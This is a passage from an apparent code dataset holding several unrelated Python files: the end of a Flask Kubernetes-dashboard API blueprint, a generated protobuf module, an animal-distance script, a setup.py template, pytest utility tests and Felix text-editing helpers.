user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(show_actions())\n\n\n@blueprint.route('/api/v1/StateNamespaces', methods=['GET'])\ndef api_state_namespaces():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_namespaces())\n\n\n@blueprint.route('/api/v1/StateNodes', methods=['GET'])\ndef api_state_nodes():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_nodes())\n\n\n@blueprint.route('/api/v1/StatePods', methods=['GET'])\ndef api_state_pods():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_pods())\n\n\n@blueprint.route('/api/v1/Terminal', methods=['GET'])\ndef api_web_terminal():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(web_terminal())\n\n\n@blueprint.route('/api/v1/ClusterName', methods=['GET'])\ndef api_cluster_name_configured():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(cluster_name_configured())\n\n\n@blueprint.route('/shutdown')\ndef shutdown():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return 'Server shutting down...'\n\n\n@blueprint.errorhandler(404)\ndef not_found_error(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n return render_template('page-404.html',\n template_folder=\"../home/templates/\"), 404\n\n\n@blueprint.errorhandler(404)\ndef internal_error(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n return render_template('page-500.html',\n template_folder=\"../home/templates/\"), 500\n\n# Errors\n# @login_manager.unauthorized_handler\n# def unauthorized_handler():\n# \"\"\"\n# Define a route.\n#\n# This is a main routing method\n# \"\"\"\n# return render_template('page-403.html',\n# template_folder=\"../home/templates/\"), 403\n\n\n# @blueprint.errorhandler(403)\n# def access_forbidden(error):\n# \"\"\"\n# Define a route.\n#\n# This is a main routing method\n# \"\"\"\n# return render_template('page-403.html',\n# template_folder=\"../home/templates/\"), 403\n"} {"ext": "py", "sha": "1a304b8753c7704f6723bc771a077928405b2e89", "content": "# Generated by the protocol buffer compiler. DO NOT EDIT!\r\n# source: communicator_objects/brain_type_proto.proto\r\n\r\nimport sys\r\n_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))\r\nfrom google.protobuf.internal import enum_type_wrapper\r\nfrom google.protobuf import descriptor as _descriptor\r\nfrom google.protobuf import message as _message\r\nfrom google.protobuf import reflection as _reflection\r\nfrom google.protobuf import symbol_database as _symbol_database\r\nfrom google.protobuf import descriptor_pb2\r\n# @@protoc_insertion_point(imports)\r\n\r\n_sym_db = _symbol_database.Default()\r\n\r\n\r\n#from communicator_objects import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2\r\n\r\nimport resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2\r\n\r\n\r\nDESCRIPTOR = _descriptor.FileDescriptor(\r\n name='communicator_objects/brain_type_proto.proto',\r\n package='communicator_objects',\r\n syntax='proto3',\r\n serialized_pb=_b('\\n+communicator_objects/brain_type_proto.proto\\x12\\x14\\x63ommunicator_objects\\x1a+communicator_objects/resolution_proto.proto*G\\n\\x0e\\x42rainTypeProto\\x12\\n\\n\\x06Player\\x10\\x00\\x12\\r\\n\\tHeuristic\\x10\\x01\\x12\\x0c\\n\\x08\\x45xternal\\x10\\x02\\x12\\x0c\\n\\x08Internal\\x10\\x03\\x42\\x1f\\xaa\\x02\\x1cMLAgents.CommunicatorObjectsb\\x06proto3')\r\n ,\r\n dependencies=[communicator__objects_dot_resolution__proto__pb2.DESCRIPTOR,])\r\n\r\n_BRAINTYPEPROTO = _descriptor.EnumDescriptor(\r\n name='BrainTypeProto',\r\n full_name='communicator_objects.BrainTypeProto',\r\n filename=None,\r\n file=DESCRIPTOR,\r\n values=[\r\n _descriptor.EnumValueDescriptor(\r\n name='Player', index=0, number=0,\r\n options=None,\r\n type=None),\r\n _descriptor.EnumValueDescriptor(\r\n name='Heuristic', index=1, number=1,\r\n options=None,\r\n type=None),\r\n _descriptor.EnumValueDescriptor(\r\n name='External', index=2, number=2,\r\n options=None,\r\n type=None),\r\n _descriptor.EnumValueDescriptor(\r\n name='Internal', index=3, number=3,\r\n options=None,\r\n type=None),\r\n ],\r\n containing_type=None,\r\n options=None,\r\n serialized_start=114,\r\n serialized_end=185,\r\n)\r\n_sym_db.RegisterEnumDescriptor(_BRAINTYPEPROTO)\r\n\r\nBrainTypeProto = enum_type_wrapper.EnumTypeWrapper(_BRAINTYPEPROTO)\r\nPlayer = 0\r\nHeuristic = 1\r\nExternal = 2\r\nInternal = 3\r\n\r\n\r\nDESCRIPTOR.enum_types_by_name['BrainTypeProto'] = _BRAINTYPEPROTO\r\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\r\n\r\n\r\nDESCRIPTOR.has_options = True\r\nDESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\\252\\002\\034MLAgents.CommunicatorObjects'))\r\n# @@protoc_insertion_point(module_scope)\r\n"} {"ext": "py", "sha": "1a304bb060903a5cd94b0ffd2af2c9cfbca5e79b", "content": "import pylab\n\n\nclass Animal:\n def __init__(self, name, egg_laying, scales, poisonous, cold_blood, legs, reptile):\n self.name = name\n self.egg_laying = egg_laying\n self.scales = scales\n self.poisonous = poisonous\n self.legs = legs\n self.cold_blood = cold_blood\n self.reptile = reptile\n\n def get_name(self):\n return self.name\n\n def distance(self, another_animal):\n distance = 0\n if self.egg_laying != another_animal.egg_laying:\n distance += 1\n if self.scales != another_animal.scales:\n distance += 1\n if self.poisonous != another_animal.poisonous:\n distance += 1\n if self.legs != another_animal.legs:\n distance += 1\n if self.cold_blood != another_animal.cold_blood:\n distance += 1\n if self.reptile != another_animal.reptile:\n distance += 1\n\n return distance\n\n def __str__(self):\n return self.name\n\n\ndef std_dev(l):\n if len(l) == 0:\n return float('NaN')\n\n summ = 0\n for i in l:\n summ += len(i)\n\n mean = summ / float(len(l))\n tot = 0.0\n for i in l:\n tot += (len(i) - mean) ** 2\n\n std = (tot / len(l)) ** 0.5\n return std\n\n\ndef z_scale_features(vals):\n result = pylab.array(vals)\n mean = float(sum(vals)) / len(vals)\n result = result - mean\n return result / std_dev(result)\n\n\ndef i_scale_features(vals):\n min_vals, max_vals = min(vals), max(vals)\n fit = pylab.polyfit([min_vals, max_vals], [0, 1], 1)\n return pylab.polyval(fit, vals)\n\n\nanimals = [Animal('cobra', 1, 1, 1, 1, 0, 1),\n Animal('rattlesnake', 1, 1, 1, 1, 0, 1),\n Animal('boa constrictor', 0, 1, 0, 1, 0, 1),\n Animal('chicken', 1, 1, 0, 1, 2, 0),\n Animal('guppy', 0, 1, 0, 0, 0, 0),\n Animal('dart frog', 1, 0, 1, 0, 4, 0),\n Animal('zebra', 0, 0, 0, 0, 4, 0),\n Animal('python', 1, 1, 0, 1, 0, 1),\n Animal('alligator', 1, 1, 0, 1, 4, 1)]\n\n\ndef distance_matrix(animals, precision):\n column_label = []\n for a in animals:\n column_label.append(a.get_name())\n row_label = column_label[:]\n table_vals = []\n\n # Get distance between pairs of animals\n for a1 in animals:\n row = []\n for a2 in animals:\n if a1 == a2:\n row.append('--')\n else:\n distance = a1.distance(a2)\n row.append(str(round(distance, precision)))\n table_vals.append(row)\n\n table = pylab.table(rowLabels=row_label,\n colLabels=column_label,\n cellText=table_vals,\n cellLoc='center',\n loc='center',\n colWidths=[0.138] * len(animals))\n table.scale(1, 2.5)\n pylab.axis('off')\n pylab.savefig('distance')\n\n\ndistance_matrix(animals, 3)\n"} {"ext": "py", "sha": "1a304c94f9d33523058aa89133e995522e180368", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Note: To use the 'upload' functionality of this file, you must:\n# $ pipenv install twine --dev\n\nimport io\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import find_packages, setup, Command\n\n# Package meta-data.\nNAME = 'mypackage'\nDESCRIPTION = 'My short description for my project.'\nURL = 'https://github.com/me/myproject'\nEMAIL = 'me@example.com'\nAUTHOR = 'Awesome Soul'\nREQUIRES_PYTHON = '>=3.8.0'\nVERSION = '0.1.0'\n\n# What packages are required for this module to be executed?\nREQUIRED = [\n # 'requests', 'maya', 'records',\n]\n\n# What packages are optional?\nEXTRAS = {\n # 'fancy feature': ['django'],\n}\n\n# The rest you shouldn't have to touch too much :)\n# ------------------------------------------------\n# Except, perhaps the License and Trove Classifiers!\n# If you do change the License, remember to change the Trove Classifier for that!\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Import the README and use it as the long-description.\n# Note: this will only work if 'README.md' is present in your MANIFEST.in file!\ntry:\n with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\nexcept FileNotFoundError:\n long_description = DESCRIPTION\n\n# Load the package's __version__.py module as a dictionary.\nabout = {}\nif not VERSION:\n project_slug = NAME.lower().replace(\"-\", \"_\").replace(\" \", \"_\")\n with open(os.path.join(here, project_slug, '__version__.py')) as f:\n exec(f.read(), about)\nelse:\n about['__version__'] = VERSION\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status('Removing previous builds…')\n rmtree(os.path.join(here, 'dist'))\n except OSError:\n pass\n\n self.status('Building Source and Wheel (universal) distribution…')\n os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))\n\n self.status('Uploading the package to PyPI via Twine…')\n os.system('twine upload dist/*')\n\n self.status('Pushing git tags…')\n os.system('git tag v{0}'.format(about['__version__']))\n os.system('git push --tags')\n\n sys.exit()\n\n\n# Where the magic happens:\nsetup(\n name=NAME,\n version=about['__version__'],\n description=DESCRIPTION,\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=AUTHOR,\n author_email=EMAIL,\n python_requires=REQUIRES_PYTHON,\n url=URL,\n packages=find_packages(exclude=[\"tests\", \"*.tests\", \"*.tests.*\", \"tests.*\"]),\n # If your package is a single module, use this instead of 'packages':\n # py_modules=['mypackage'],\n\n # entry_points={\n # 'console_scripts': ['mycli=mymodule:cli'],\n # },\n install_requires=REQUIRED,\n extras_require=EXTRAS,\n include_package_data=True,\n license='MIT',\n classifiers=[\n # Trove classifiers\n # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy'\n ],\n # $ setup.py publish support.\n cmdclass={\n 'upload': UploadCommand,\n },\n)\n"} {"ext": "py", "sha": "1a304d958c1bf8226f9dfa8a1c718239de92b0d2", "content": "class ResampleQuality:\n r\"\"\"Quality levels for resampling.\"\"\"\n QUICK = 'q'\n LOW = 'l'\n MEDIUM = 'm'\n HIGH = 'h'\n VERY_HIGH = 'v'\n"} {"ext": "py", "sha": "1a304d961a3e03a6460d3f21abd9d9ba9cbc8ecf", "content": "#!/usr/bin/env python3\n\nimport pytest # type: ignore\nimport os\nimport time\nimport random\nimport pathlib\nimport numpy as np # type: ignore\nimport numpy\nfrom glob import iglob\nfrom pathlib import Path\nimport rtCommon.utils as utils # type: ignore\nimport rtCommon.projectUtils as putils # type: ignore\nimport rtCommon.validationUtils as vutils # type: ignore\nfrom rtCommon.structDict import MatlabStructDict # type: ignore\nfrom rtCommon.addLogin import addUserPassword\nfrom rtCommon.webHttpHandlers import loadPasswdFile\n\n\n@pytest.fixture(scope=\"module\")\ndef matTestFilename(): # type: ignore\n return os.path.join(os.path.dirname(__file__), 'test_input/teststruct.mat')\n\n\nclass TestFindNewestFile:\n TEST_BASE_FILENAME = '/tmp/testdir/file1_20170101T01010'\n NUM_TEST_FILES = 5\n\n def setup_class(cls):\n # create tmp directory if it doesn't exist\n pathlib.Path('/tmp/testdir/').mkdir(parents=True, exist_ok=True)\n # check if test files already exist, get the count of them\n count_testfiles = sum(1 for _ in iglob(TestFindNewestFile.TEST_BASE_FILENAME + \"*\"))\n if count_testfiles != TestFindNewestFile.NUM_TEST_FILES:\n # remove any existing testfiles\n for filename in iglob(TestFindNewestFile.TEST_BASE_FILENAME + \"*\"):\n os.remove(filename)\n # create the correct number of test files\n for i in range(TestFindNewestFile.NUM_TEST_FILES):\n filename = TestFindNewestFile.TEST_BASE_FILENAME + str(i)\n with open(filename, 'w') as fp:\n fp.write(\"test file\")\n time.sleep(1)\n\n def assert_result_matches_filename(self, filename):\n assert filename == (self.TEST_BASE_FILENAME + str(self.NUM_TEST_FILES - 1))\n\n def test_normalCase(self):\n print(\"Test findNewestFile normal case:\")\n filename = utils.findNewestFile('/tmp/testdir', 'file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_emptyPath(self):\n print(\"Test findNewestFile empty path:\")\n filename = utils.findNewestFile('', '/tmp/testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_pathInPattern(self):\n print(\"Test findNewestFile path embedded in pattern:\")\n filename = utils.findNewestFile(\n '/tmp/testdir', '/tmp/testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_pathPartiallyInPattern(self):\n print(\"Test findNewestFile path partially in pattern:\")\n filename = utils.findNewestFile('/tmp', 'testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_noMatchingFiles(self):\n print(\"Test findNewestFile no matching files:\")\n filename = utils.findNewestFile('/tmp/testdir/', 'no_such_file')\n assert filename is None\n\n\nclass TestCompareArrays:\n A = None\n B = None\n max_deviation = .01\n\n def setup_class(cls):\n arrayDims = [40, 50, 60]\n A = np.random.random(arrayDims)\n delta = np.random.random(arrayDims) * TestCompareArrays.max_deviation\n B = A + (A * delta)\n TestCompareArrays.A = A\n TestCompareArrays.B = B\n\n def test_compareArrays(self):\n print(\"Test compareArrays\")\n # import pdb; pdb.set_trace()\n result = vutils.compareArrays(self.B, self.A)\n assert result['mean'] < 2 / 3 * self.max_deviation\n assert result['max'] < self.max_deviation\n return\n\n def test_areArraysClose(self):\n print(\"Test areArraysClose\")\n max_mean = 2 / 3 * self.max_deviation\n assert vutils.areArraysClose(self.B, self.A, mean_limit=max_mean)\n return\n\n\nclass TestCompareMatStructs:\n A = None\n B = None\n max_deviation = .01\n\n def setup_class(cls):\n def delta(val):\n return val + (val * random.random() * TestCompareMatStructs.max_deviation)\n A = MatlabStructDict(\n {'sub': MatlabStructDict({})}, 'sub')\n A.str1 = \"hello\"\n A.a1 = 6.0\n A.sub.a2 = np.array([1, 2, 3, 4, 5], dtype=np.float)\n A.sub.b2 = 7.0\n A.sub.str2 = \"world\"\n B = MatlabStructDict(\n {'sub': MatlabStructDict({})}, 'sub')\n B.str1 = \"hello\"\n B.a1 = delta(A.a1)\n B.sub.a2 = delta(A.a2)\n B.sub.b2 = delta(A.b2)\n B.sub.str2 = \"world\"\n TestCompareMatStructs.A = A\n TestCompareMatStructs.B = B\n\n def test_compareMatStructs_all_fields(self):\n print(\"Test compareMatStructs_all_fields\")\n result = vutils.compareMatStructs(self.A, self.B)\n means = [result[key]['mean'] for key in result.keys()]\n assert len(means) == 5\n assert all(mean < self.max_deviation for mean in means)\n\n def test_compareMatStructs_field_subset(self):\n print(\"Test compareMatStructs_field_subset\")\n result = vutils.compareMatStructs(self.A, self.B, ['a2', 'str1'])\n means = [result[key]['mean'] for key in result.keys()]\n assert len(means) == 2\n assert all(mean < self.max_deviation for mean in means)\n\n def test_isMeanWithinThreshold(self):\n a = {'val1': {'mean': .1, 'max': .2},\n 'val2': {'mean': .05, 'max': .075}}\n assert vutils.isMeanWithinThreshold(a, .11)\n assert not vutils.isMeanWithinThreshold(a, .09)\n\n\nclass TestValidationUtils:\n def test_compareMatFiles(self, matTestFilename):\n res = vutils.compareMatFiles(matTestFilename, matTestFilename)\n assert vutils.isMeanWithinThreshold(res, 0)\n\n def test_pearsonsMeanCorr(self):\n n1 = np.array([[1, 2, 3, 4, 5],\n [np.nan, np.nan, np.nan, np.nan, np.nan]])\n n2 = np.array([[1.1, 2.1, 3.2, 4.1, 5.05],\n [np.nan, np.nan, np.nan, np.nan, np.nan]])\n n1t = np.transpose(n1)\n n2t = np.transpose(n2)\n res = vutils.pearsons_mean_corr(n1t, n2t)\n assert res > 0.999\n\nclass TestUtils:\n def test_delete(self):\n fileList = ['/tmp/testdir/d1/test1.txt', '/tmp/testdir/d1/d2/test2.txt',\n '/tmp/testdir/d1/d2/d3/test3.txt', '/tmp/testdir/d1/d2/d3/test4.txt']\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n\n # test delete files from list\n assert os.path.exists(fileList[-1])\n utils.deleteFilesFromList(fileList)\n assert not os.path.exists(fileList[-1])\n assert os.path.isdir('/tmp/testdir/d1/d2/d3')\n\n # test delete folder\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n utils.deleteFolder('/tmp/testdir/d1')\n assert not os.path.isdir('/tmp/testdir/d1')\n\n # test delete files recursively in folders, but leave folders in place\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n utils.deleteFolderFiles('/tmp/testdir/d1')\n assert os.path.isdir('/tmp/testdir/d1/d2/d3')\n\nclass TestAddUser:\n def test_adduser(self):\n testPasswordFile = '/tmp/testdir/test_pwd_file'\n # start with empty file\n if os.path.exists(testPasswordFile):\n os.remove(testPasswordFile)\n addUserPassword('a_user', 'a_password', testPasswordFile, retypePasswd=False)\n addUserPassword('b_user', 'b_password', testPasswordFile, retypePasswd=False)\n pwds = loadPasswdFile(testPasswordFile)\n assert 'a_user' in pwds\n assert 'b_user' in pwds\n\nclass TestProjectUtils:\n def test_npToPy(self):\n data1 = {'subject': '04', 'task': 'story', 'suffix': 'bold', 'datatype': 'func', 'run': 1}\n data2 = {'a1': (1, 'two', 3.0),\n 'a2': {'np': numpy.float32(3), 'pyint': 4, 'str': 'five'},\n 'a3': [6.0, 'seven', numpy.int(8), {'a', numpy.float32(5), 'c'}]}\n data2_py = {'a1': (1, 'two', 3.0),\n 'a2': {'np': 3.0, 'pyint': 4, 'str': 'five'},\n 'a3': [6.0, 'seven', 8.0, {'a', 5.0, 'c'}]}\n kwargs = {'mdata': data2, 'test1': 9.0, 'test2': numpy.float32(9), 'test3': 'yes'}\n kwargs_py = {'mdata': data2_py, 'test1': 9.0, 'test2': 9.0, 'test3': 'yes'}\n args = (4, 'hello', data1, kwargs)\n args_py = (4, 'hello', data1, kwargs_py)\n res = putils.npToPy(args)\n assert res == args_py\n\n\nif __name__ == \"__main__\":\n print(\"PYTEST MAIN:\")\n pytest.main()\n"} {"ext": "py", "sha": "1a304e1024ad069dcf72a7729caa76ee2217ce61", "content": "# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utility functions for Felix.\"\"\"\n\nimport json\nfrom typing import Callable, Iterator, Mapping, MutableSequence, NamedTuple, Optional, Sequence, Tuple, Union\n\nfrom absl import logging\nfrom six import with_metaclass\nimport tensorflow as tf\n\nimport felix_constants as constants\nimport tokenization\n\nFeedDict = Mapping[str, Sequence[Sequence[float]]]\nSourceTargetPair = Tuple[MutableSequence[str], str]\n\n\ndef get_token_list(text):\n \"\"\"Returns a list of tokens.\n\n This function expects that the tokens in the text are separated by space\n character(s). Example: \"ca n't , touch\". This is the case at least for the\n public DiscoFuse and WikiSplit datasets.\n\n Args:\n text: String to be split into tokens.\n \"\"\"\n return text.split()\n\n\ndef build_feed_dict(tokens,\n tokenizer,\n target_tokens = None,\n max_seq_length = 128,\n max_predictions_per_seq = 20):\n \"\"\"Returns a dictionary used for predicting/training the insertion model.\n\n Converts a list of source tokens, containing masks, to a dictionary of\n features used by a TF model. If a target sequence is provided, then the\n targets for the MASKs are set.\n\n Args:\n tokens: Input tokens, with mask tokens.\n tokenizer: Tokenizer used to convert tokens to IDs.\n target_tokens: (Optional) The targets of the mask tokens.\n max_seq_length: Maximum sequence length.\n max_predictions_per_seq: Maximum number of mask tokens.\n\n Returns:\n Dictionary with model features or None if `len(tokens) > max_seq_length` or\n if the number of MASKs is larger than `max_predictions_per_seq`.\n \"\"\"\n mask_position = []\n mask_target_id = []\n mask_target_weight = []\n\n for idx, token in enumerate(tokens):\n if token != constants.MASK:\n continue\n\n mask_position.append(idx)\n if target_tokens:\n mask_target_id += tokenizer.convert_tokens_to_ids([target_tokens[idx]])\n else:\n mask_target_id.append(0)\n mask_target_weight.append(1.0)\n\n # Deleted tokens (bracketed by unused) should have a segment_id of 2.\n unused = False\n segment_ids = []\n for token in tokens:\n if token == constants.DELETE_SPAN_START or unused:\n unused = True\n segment_ids.append(2)\n else:\n segment_ids.append(0)\n if token == constants.DELETE_SPAN_END:\n unused = False\n input_mask = [1] * len(tokens)\n input_ids = tokenizer.convert_tokens_to_ids(tokens)\n\n assert len(segment_ids) == len(input_ids)\n # Padding.\n while len(input_ids) < max_seq_length:\n segment_ids.append(0)\n input_ids.append(0)\n input_mask.append(0)\n\n if len(input_ids) > max_seq_length:\n input_ids = input_ids[:max_seq_length]\n segment_ids = segment_ids[:max_seq_length]\n input_mask = input_mask[:max_seq_length]\n #return None\n\n assert len(input_ids) == max_seq_length, \"len(input_ids) = {}\".format(\n len(input_ids))\n assert len(input_mask) == max_seq_length, \"len(input_mask) = {}\".format(\n len(input_mask))\n assert len(segment_ids) == max_seq_length, \"len(segment_ids) = {}\".format(\n len(segment_ids))\n\n if len(mask_position) > max_predictions_per_seq:\n mask_position = mask_position[:max_predictions_per_seq]\n #return None\n while len(mask_position) < max_predictions_per_seq:\n mask_target_weight.append(0)\n mask_position.append(0)\n mask_target_id.append(0)\n\n feed_dict = {\n \"input_ids\": [input_ids],\n \"input_mask\": [input_mask],\n \"segment_ids\": [segment_ids],\n \"masked_lm_positions\": [mask_position],\n \"masked_lm_ids\": [mask_target_id],\n \"masked_lm_weights\": [mask_target_weight],\n }\n\n return feed_dict\n\n\ndef _int_feature(values):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n\ndef _float_feature(values):\n return tf.train.Feature(float_list=tf.train.FloatList(value=values))\n\n\ndef _text_feature(values):\n return tf.train.Feature(\n bytes_list=tf.train.BytesList(\n value=[element.encode(\"utf8\") for element in values]))\n\n\ndef feed_dict_to_tf_example(feed_dict,\n source = None,\n target = None):\n \"\"\"Returns a TF example for MLM insertion model.\"\"\"\n features = {\n \"input_ids\": _int_feature(feed_dict[\"input_ids\"][0]),\n \"input_mask\": _int_feature(feed_dict[\"input_mask\"][0]),\n \"segment_ids\": _int_feature(feed_dict[\"segment_ids\"][0]),\n \"masked_lm_positions\": _int_feature(feed_dict[\"masked_lm_positions\"][0]),\n \"masked_lm_ids\": _int_feature(feed_dict[\"masked_lm_ids\"][0]),\n \"masked_lm_weights\": _float_feature(feed_dict[\"masked_lm_weights\"][0]),\n }\n if source:\n features[\"text_source\"] = _text_feature([source])\n if target:\n features[\"text_target\"] = _text_feature([target])\n return tf.train.Example(features=tf.train.Features(feature=features))\n\n\nclass Features(NamedTuple):\n \"\"\"A data holder for various features that can be read from files.\"\"\"\n source: MutableSequence[str]\n target: str\n output_variant_id: Optional[int] = None\n\n @staticmethod\n def from_source_target_pair(pair):\n return Features(source=pair[0], target=pair[1])\n\nSourcesAndFeaturesPair = Tuple[MutableSequence[str], Features]\n\n\ndef text_file_iterator(fname_pattern):\n \"\"\"Returns an iterator over lines of the files covered by fname_pattern.\"\"\"\n for fname in get_filenames(fname_pattern):\n with tf.io.gfile.GFile(fname, \"r\") as f:\n for line in f:\n yield line\n\n\ndef skip_header_text_file_iterator(fname_pattern):\n \"\"\"Similar to text_file_iterator, but skipping the first line of each file.\"\"\"\n for fname in get_filenames(fname_pattern):\n tf.io.gfile.GFile(fname)\n it = tf.io.gfile.GFile(fname, \"r\")\n it.next() # skip the header line\n for line in it:\n yield line\n\n\ndef get_parse_tsv_line_fn(\n return_none_on_error = False,\n reverse = False):\n \"\"\"A higher-order function producing TSV line-parsing functions.\n\n Args:\n return_none_on_error: Whether to return None on encountering an error (such\n as too few TSV columns) rather than raising an Error.\n reverse: When True, returns ([`target`], `source`) instead of ([`source`],\n `target`). Useful for working with \"reverse\" (a.k.a. \"noise\" models that\n go from `target` to `source`.\n\n Returns:\n A parsing function that goes from a text line to a ([source], target) pair\n (or a ([`target`], `source`) pair when `reverse`=True).\n \"\"\"\n\n def parse_tsv_line(line):\n \"\"\"Parses the first two columns, `source` and `target`, from a TSV line.\n\n Any further columns are ignored.\n\n Args:\n line: A text line.\n\n Returns:\n a tuple ([source], target), with `source` being wrapped in a list.\n\n Raises:\n ValueError: when the line has less than two TSV columns and\n `return_none_on_error`=False.\n \"\"\"\n split = line.rstrip(\"\\n\").split(\"\\t\")\n if len(split) < 2:\n message = 'TSV line has less than two tab-delimited fields:\\n\"{}\"'.format(\n line)\n if return_none_on_error:\n logging.warning(message)\n return None\n else:\n raise ValueError(message)\n source, target = split[:2]\n if reverse:\n return [target], source\n else:\n return [source], target\n\n return parse_tsv_line\n\n\ndef parse_discofuse_line(line):\n \"\"\"Parses a DiscoFuse example from a line from a TSV file.\n\n The documentation for this format:\n https://github.com/google-research-datasets/discofuse#data-format\n\n Args:\n line: A line from a TSV file.\n\n Returns:\n A pair (, ).\n \"\"\"\n coherent_1, coherent_2, incoherent_1, incoherent_2, _, _, _, _ = (\n line.rstrip(\"\\n\").split(\"\\t\"))\n # Strip because the second coherent sentence might be empty.\n fusion = (coherent_1 + \" \" + coherent_2).strip()\n return [incoherent_1, incoherent_2], fusion\n\n\ndef parse_iterate_plain_line(line):\n return _parse_iterate_line(line, with_intent=False)\n\n\ndef parse_iterate_intent_line(line):\n return _parse_iterate_line(line, with_intent=True)\n\n\ndef _parse_iterate_line(line, with_intent=False):\n \"\"\"Parses a IteraTE example from a line from a (line-by-line) JSON file.\n\n Args:\n line: A JSON line from a line-by-line JSON file.\n\n Returns:\n A tuple ([source], target), with `source` being wrapped in a list.\n \"\"\"\n json_line = json.loads(line)\n if with_intent:\n src = json_line[\"before_sent_with_intent\"]\n else:\n src = json_line[\"before_sent\"]\n tgt = json_line[\"after_sent\"]\n return [src], 